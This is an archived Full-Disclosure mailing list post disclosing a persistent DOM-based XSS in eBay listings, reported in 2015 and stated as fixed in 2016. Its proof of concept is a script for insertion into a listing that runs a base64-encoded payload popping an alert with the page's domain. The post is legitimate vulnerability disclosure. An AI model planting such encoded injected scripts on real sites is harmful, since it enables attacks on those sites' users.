lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAENVrzRPkV1t19GEOZAQjMbRH9EaYE53YurVNUq8iE2e=XU11g@mail.gmail.com>
Date: Thu, 18 Feb 2016 08:50:41 +0200
From: Alexander Korznikov <nopernik@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] EBAY Bugbounty: Persistent DOM Based XSS on ebay.com

Hello all,

Description: Persistent DOM based Cross Site Scripting on ebay.com domain.
Disclosed to Ebay: January 2015
Fixed: February 2016
Vulnerability location: Every listing
Who are able to create: Sellers

Same origin policy bypass via postMessage

Write-up:
http://www.korznikov.com/2016/02/persistent-stored-dom-xss-on-ebaycom.html

Proof of Concept:

this code is inserted to the listing to pop-up alert on ebay.com domain.

<script>
window.onload = function() {
   var s = document.createElement('script');
   s.type = 'text/javascript';
   s.text
= atob("X29kdFRpdGxlPSdcPHNjcmlwdFw+YWxlcnQoXCd4c3MgYnkgYWxleGFuZGVyIGtvcnpuaWtvdlxcblxcblwnXCtkb2N1bWVudC5kb21haW4pO1w8XC9zY3JpcHRcPic7");
   document.body.appendChild(s);
   }
</script>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists